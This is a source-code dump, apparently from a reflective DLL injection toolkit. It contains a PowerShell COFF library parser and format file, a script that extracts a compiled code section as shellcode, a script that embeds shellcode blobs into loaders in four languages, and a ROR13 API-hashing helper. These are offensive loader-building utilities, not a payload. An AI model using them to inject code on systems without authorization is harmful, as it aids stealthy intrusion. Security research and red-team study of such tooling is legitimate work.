149 | # You cannot parse the lib header if the file is not big enough to contain a lib header.
150 | Write-Error "$($LibFileName) is too small to store a lib header."
151 | $FileStream.Dispose()
152 | return
153 | }
154 |
155 | # Open a BinaryReader object for the lib file
156 | $BinaryReader = New-Object IO.BinaryReader($FileStream)
157 |
158 | $ArchiveStart = [Text.Encoding]::UTF8.GetString($BinaryReader.ReadBytes(8))
159 |
160 | if ($ArchiveStart -ne $IMAGE_ARCHIVE_START)
161 | {
162 | Write-Error "$($LibFileName) does not contain a valid lib header."
163 | Dispose-Objects
164 | return
165 | }
166 |
167 | # Parse the first archive header
168 | $ArchiveHeader = New-Object COFF.IMAGE_ARCHIVE_MEMBER_HEADER($BinaryReader)
169 |
170 | if ($ArchiveHeader.EndHeader -ne $IMAGE_ARCHIVE_END)
171 | {
172 | Write-Error "$($LibFileName) does not contain a valid lib header."
173 | Dispose-Objects
174 | return
175 | }
176 |
177 | # Check for the existence of symbols
178 | if ($ArchiveHeader.Size -eq 0)
179 | {
180 | Write-Warning "$($LibFileName) contains no symbols."
181 | Dispose-Objects
182 | return
183 | }
184 |
185 | $NumberOfSymbols = $BinaryReader.ReadBytes(4)
186 |
187 | # The offsets in the first archive header of a Microsoft lib file are stored in big-endian format
188 | if ([BitConverter]::IsLittleEndian)
189 | {
190 | [Array]::Reverse($NumberOfSymbols)
191 | }
192 |
193 | $NumberOfSymbols = [BitConverter]::ToUInt32($NumberOfSymbols, 0)
194 |
195 | $SymbolOffsets = New-Object UInt32[]($NumberOfSymbols)
196 |
197 | foreach ($Offset in 0..($SymbolOffsets.Length - 1))
198 | {
199 | $SymbolOffset = $BinaryReader.ReadBytes(4)
200 |
201 | if ([BitConverter]::IsLittleEndian)
202 | {
203 | [Array]::Reverse($SymbolOffset)
204 | }
205 |
206 | $SymbolOffsets[$Offset] = [BitConverter]::ToUInt32($SymbolOffset, 0)
207 | }
208 |
209 | $SymbolStringLength = $ArchiveHeader.Size + $IMAGE_SIZEOF_LIB_HDR - $FileStream.Position - 1
210 | # $SymbolStrings = [Text.Encoding]::UTF8.GetString($BinaryReader.ReadBytes($SymbolStringLength)).Split([Char] 0)
211 |
212 | # Write-Output $SymbolStrings
213 |
214 | # There will be many duplicate offset entries. Remove them.
215 | $SymbolOffsetsSorted = $SymbolOffsets | Sort-Object -Unique
216 |
217 | $SymbolOffsetsSorted | ForEach-Object {
218 | # Seek to the each repective offset in the file
219 | $FileStream.Seek($_, 'Begin') | Out-Null
220 |
221 | $ArchiveHeader = New-Object COFF.IMAGE_ARCHIVE_MEMBER_HEADER($BinaryReader)
222 |
223 | # This is not a true COFF header. It's the same size and mostly resembles a standard COFF header
224 | # but Microsoft placed a marker (0xFFFF) in the first WORD to indicate that the 'object file'
225 | # consists solely of the module name and symbol.
226 | $CoffHeader = New-Object COFF.HEADER($BinaryReader)
227 |
228 | # Check for 0xFFFF flag value
229 | if ($CoffHeader.NumberOfSections -eq [UInt16]::MaxValue)
230 | {
231 | # Get the total length of the module and symbol name
232 | $SymbolStringLength = $CoffHeader.NumberOfSymbols
233 | $Symbols = [Text.Encoding]::UTF8.GetString($BinaryReader.ReadBytes($SymbolStringLength)).Split([Char] 0)
234 |
235 | $DecoratedSymbol = $Symbols[0]
236 | $UndecoratedSymbol = ''
237 |
238 | # Default to a 'C' type symbol unless it starts with a '?'
239 | $SymbolType = 'C'
240 |
241 | # Is the symbol a C++ type?
242 | if ($DecoratedSymbol.StartsWith('?'))
243 | {
244 | $StrBuilder = New-Object Text.Stringbuilder(512)
245 | # Magically undecorated the convoluted C++ symbol into a proper C++ function definition
246 | [COFF.Functions]::UnDecorateSymbolName($DecoratedSymbol, $StrBuilder, $StrBuilder.Capacity, 0) | Out-Null
247 | $UndecoratedSymbol = $StrBuilder.ToString()
248 | $SymbolType = 'C++'
249 | }
250 | else
251 | {
252 | if ($DecoratedSymbol[0] -eq '_' -or $DecoratedSymbol[0] -eq '@')
253 | {
254 | $UndecoratedSymbol = $DecoratedSymbol.Substring(1).Split('@')[0]
255 | }
256 | else
257 | {
258 | $UndecoratedSymbol = $DecoratedSymbol.Split('@')[0]
259 | }
260 | }
261 |
262 | $SymInfo = @{
263 | DecoratedName = $DecoratedSymbol
264 | UndecoratedName = $UndecoratedSymbol
265 | Module = $Symbols[1]
266 | SymbolType = $SymbolType
267 | }
268 |
269 | $ParsedSymbol = New-Object PSObject -Property $SymInfo
270 | $ParsedSymbol.PSObject.TypeNames[0] = 'COFF.SymbolInfo'
271 |
272 | Write-Output $ParsedSymbol
273 | }
274 | }
275 |
276 | # Close file and binaryreader objects
277 | Dispose-Objects
278 | }
279 | }
280 |
281 | END {}
282 | }
--------------------------------------------------------------------------------
/lib/PowerShell/Get-ObjDump.format.ps1xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | ObjectFileView
6 |
7 | COFF.OBJECT_FILE
8 |
9 |
10 |
11 |
12 |
13 |
14 | COFFHeader
15 |
16 |
17 | SectionHeaders
18 |
19 |
20 | SymbolTable
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 | COFFHeaderView
29 |
30 | COFF.HEADER
31 |
32 |
33 |
34 |
35 |
36 |
37 | Machine
38 |
39 |
40 | NumberOfSections
41 | 0x{0:X4}
42 |
43 |
44 | TimeDateStamp
45 |
46 |
47 | PointerToSymbolTable
48 | 0x{0:X8}
49 |
50 |
51 | NumberOfSymbols
52 | 0x{0:X8}
53 |
54 |
55 | SizeOfOptionalHeader
56 | 0x{0:X4}
57 |
58 |
59 | Characteristics
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 | SectionHeaderView
68 |
69 | COFF.SECTION_HEADER
70 |
71 |
72 |
73 |
74 |
75 |
76 | Name
77 |
78 |
79 | PhysicalAddress
80 | 0x{0:X8}
81 |
82 |
83 | VirtualSize
84 | 0x{0:X8}
85 |
86 |
87 | VirtualAddress
88 | 0x{0:X8}
89 |
90 |
91 | SizeOfRawData
92 | 0x{0:X8}
93 |
94 |
95 | PointerToRawData
96 | 0x{0:X8}
97 |
98 |
99 | PointerToRelocations
100 | 0x{0:X8}
101 |
102 |
103 | PointerToLinenumbers
104 | 0x{0:X8}
105 |
106 |
107 | NumberOfRelocations
108 | 0x{0:X4}
109 |
110 |
111 | NumberOfLinenumbers
112 | 0x{0:X4}
113 |
114 |
115 | Characteristics
116 |
117 |
118 | RawData
119 |
120 |
121 | Relocations
122 |
123 |
124 |
125 |
126 |
127 |
128 |
129 | SymbolTableView
130 |
131 | COFF.SYMBOL_TABLE
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 | Name
163 |
164 |
165 | Value
166 | 0x{0:X8}
167 |
168 |
169 | SectionNumber
170 |
171 |
172 | Type
173 |
174 |
175 | StorageClass
176 |
177 |
178 | NumberOfAuxSymbols
179 | 0x{0:X2}
180 |
181 |
182 | AuxSymbols
183 |
184 |
185 |
186 |
187 |
188 |
189 |
190 | SectionDefinitionView
191 |
192 | COFF.SECTION_DEFINITION
193 |
194 |
195 |
196 |
197 |
198 |
199 |
200 |
201 |
202 |
203 |
204 |
205 |
206 |
207 |
208 |
209 |
210 |
211 |
212 |
213 |
214 |
215 |
216 |
217 |
218 |
219 |
220 | Length
221 | 0x{0:X8}
222 |
223 |
224 | NumberOfRelocations
225 | 0x{0:X4}
226 |
227 |
228 | NumberOfLinenumbers
229 | 0x{0:X4}
230 |
231 |
232 | CheckSum
233 | 0x{0:X8}
234 |
235 |
236 | Number
237 | 0x{0:X4}
238 |
239 |
240 | Selection
241 | 0x{0:X2}
242 |
243 |
244 |
245 |
246 |
247 |
248 |
249 | RelocationView
250 |
251 | COFF.RelocationEntry
252 |
253 |
254 |
255 |
256 |
257 |
258 |
259 |
260 |
261 |
262 |
263 |
264 |
265 |
266 |
267 |
268 |
269 |
270 |
271 |
272 |
273 | VirtualAddress
274 | 0x{0:X8}
275 |
276 |
277 | SymbolTableIndex
278 | 0x{0:X8}
279 |
280 |
281 | Type
282 |
283 |
284 | Name
285 |
286 |
287 |
288 |
289 |
290 |
291 |
292 |
--------------------------------------------------------------------------------
/lib/PowerShell/Out-Shellcode.ps1:
--------------------------------------------------------------------------------
1 | Param (
2 | [Parameter(Position = 0, Mandatory = $True)]
3 | [String]
4 | $InputExe,
5 |
6 | [Parameter(Position = 1, Mandatory = $True)]
7 | [ValidateScript({ Test-Path $_ })]
8 | [String]
9 | $InputMapFile,
10 |
11 | [Parameter(Position = 2, Mandatory = $True)]
12 | [String]
13 | $OutputFile
14 | )
15 |
16 | # PowerShell v2
17 | if(!$PSScriptRoot){
18 | $PSScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent
19 | }
20 |
21 | . "$PSScriptRoot\Get-PEHeader.ps1"
22 |
23 | $PE = Get-PEHeader $InputExe -GetSectionData
24 | $TextSection = $PE.SectionHeaders | Where-Object { $_.Name -eq '.text' }
25 |
26 | $MapContents = Get-Content $InputMapFile
27 |
28 | $TextSectionInfo = @($MapContents | Where-Object { $_ -match '\.text.+CODE' })[0]
29 |
30 | $ShellcodeLength = [Int] "0x$(( $TextSectionInfo -split ' ' | Where-Object { $_ } )[1].TrimEnd('H'))" - 1
31 |
32 | Write-Host "Shellcode length: 0x$(($ShellcodeLength + 1).ToString('X4'))"
33 |
34 | [IO.File]::WriteAllBytes($OutputFile, $TextSection.RawData[0..$ShellcodeLength])
35 |
--------------------------------------------------------------------------------
/lib/Python/EncodeBlobs.py:
--------------------------------------------------------------------------------
1 | import argparse
2 | import os
3 | import sys
4 |
5 | StartMarker = 'MARKER:S'
6 | EndMarker = 'MARKER:E'
7 |
8 | NativeTemplate = """
9 | LPSTR rdiShellcode32 = "{}";
10 | LPSTR rdiShellcode64 = "{}";
11 | DWORD rdiShellcode32Length = {}, rdiShellcode64Length = {};
12 | """
13 |
14 | DotNetTemplate = """
15 | var rdiShellcode32 = new byte[] {{ {} }};
16 | var rdiShellcode64 = new byte[] {{ {} }};
17 | """
18 |
19 | PythonTemplate = """
20 | rdiShellcode32 = b'{}'
21 | rdiShellcode64 = b'{}'
22 | """
23 |
24 | def main():
25 | parser = argparse.ArgumentParser(description='sRDI Blob Encoder', conflict_handler='resolve')
26 | parser.add_argument('solution_dir', help='Solution Directory')
27 | arguments = parser.parse_args()
28 |
29 | binFile32 = os.path.join(arguments.solution_dir, 'bin', 'ShellcodeRDI_x86.bin')
30 | binFile64 = os.path.join(arguments.solution_dir, 'bin', 'ShellcodeRDI_x64.bin')
31 |
32 | native_file = os.path.join(arguments.solution_dir, 'Native/Loader.cpp')
33 | dotnet_file = os.path.join(arguments.solution_dir, 'DotNet/Program.cs')
34 | python_file = os.path.join(arguments.solution_dir, 'Python/ShellcodeRDI.py')
35 | posh_file = os.path.join(arguments.solution_dir, 'PowerShell/ConvertTo-Shellcode.ps1')
36 |
37 | if not os.path.isfile(binFile32) or not os.path.isfile(binFile64):
38 | print("[!] ShellcodeRDI_x86.bin and ShellcodeRDI_x64.bin files weren't in the bin directory")
39 | return
40 |
41 | binData32 = open(binFile32, 'rb').read()
42 | binData64 = open(binFile64, 'rb').read()
43 |
44 | # Patch the native loader
45 |
46 | native_insert = NativeTemplate.format(
47 | ''.join('\\x{:02X}'.format(b) for b in binData32),
48 | ''.join('\\x{:02X}'.format(b) for b in binData64),
49 | len(binData32), len(binData64)
50 | )
51 |
52 | code = open(native_file, 'r').read()
53 | start = code.find(StartMarker) + len(StartMarker)
54 | end = code.find(EndMarker) - 2 # for the //
55 | code = code[:start] + native_insert + code[end:]
56 | open(native_file, 'w').write(code)
57 |
58 | print('[+] Updated {}'.format(native_file))
59 |
60 |
61 | # Patch the DotNet loader
62 |
63 | dotnet_insert = DotNetTemplate.format(
64 | ','.join('0x{:02X}'.format(b) for b in binData32),
65 | ','.join('0x{:02X}'.format(b) for b in binData64)
66 | )
67 |
68 | code = open(dotnet_file, 'r').read()
69 | start = code.find(StartMarker) + len(StartMarker)
70 | end = code.find(EndMarker) - 2 # for the //
71 | code = code[:start] + dotnet_insert + code[end:]
72 | open(dotnet_file, 'w').write(code)
73 |
74 | print('[+] Updated {}'.format(dotnet_file))
75 |
76 |
77 | # Patch the Python loader
78 |
79 | python_insert = PythonTemplate.format(
80 | ''.join('\\x{:02X}'.format(b) for b in binData32),
81 | ''.join('\\x{:02X}'.format(b) for b in binData64)
82 | )
83 |
84 | code = open(python_file, 'r').read()
85 | start = code.find(StartMarker) + len(StartMarker)
86 | end = code.find(EndMarker) - 1 # for the #
87 | code = code[:start] + python_insert + code[end:]
88 | open(python_file, 'w').write(code)
89 |
90 | print('[+] Updated {}'.format(python_file))
91 |
92 |
93 | # Patch the PowerShell loader
94 |
95 | posh_insert = DotNetTemplate.format(
96 | ','.join('0x{:02X}'.format(b) for b in binData32),
97 | ','.join('0x{:02X}'.format(b) for b in binData64)
98 | )
99 |
100 | code = open(posh_file, 'r').read()
101 | start = code.find(StartMarker) + len(StartMarker)
102 | end = code.find(EndMarker) - 2 # for the //
103 | code = code[:start] + posh_insert + code[end:]
104 | open(posh_file, 'w').write(code)
105 |
106 | print('[+] Updated {}'.format(posh_file))
107 |
108 |
109 | print("")
110 |
111 | if __name__ == '__main__':
112 | main()
113 |
--------------------------------------------------------------------------------
/lib/Python/FunctionToHash.py:
--------------------------------------------------------------------------------
1 |
2 | import sys
3 |
4 | ror = lambda val, r_bits, max_bits: \
5 | ((val & (2**max_bits-1)) >> r_bits%max_bits) | \
6 | (val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
7 |
8 | if len(sys.argv) != 2 and len(sys.argv) != 3:
9 | print("\nUsage:\nFunctionToHash.py [Module] [Function]\nFunctionToHash.py kernel32.dll CreateProcessA\n\nOR\n\nFunctionToHash.py [Function]\nFunctionToHash.py ExportedFunction")
10 | exit()
11 |
12 | if len(sys.argv) == 3:
13 | module = sys.argv[1].upper().encode('UTF-16LE') + b'\x00\x00'
14 | function = sys.argv[2].encode() + b'\x00'
15 |
16 | functionHash = 0
17 |
18 | for b in function:
19 | functionHash = ror(functionHash, 13, 32)
20 | functionHash += b
21 |
22 | moduleHash = 0
23 |
24 | for b in module:
25 | moduleHash = ror(moduleHash, 13, 32)
26 | moduleHash += b
27 |
28 | functionHash += moduleHash
29 |
30 | if functionHash > 0xFFFFFFFF: functionHash -= 0x100000000
31 |
32 | else:
33 | function = sys.argv[1].encode() + b'\x00'
34 |
35 | functionHash = 0
36 |
37 | for b in function:
38 | functionHash = ror(functionHash, 13, 32)
39 | functionHash += b
40 |
41 |
42 | print(hex(functionHash))
43 |
--------------------------------------------------------------------------------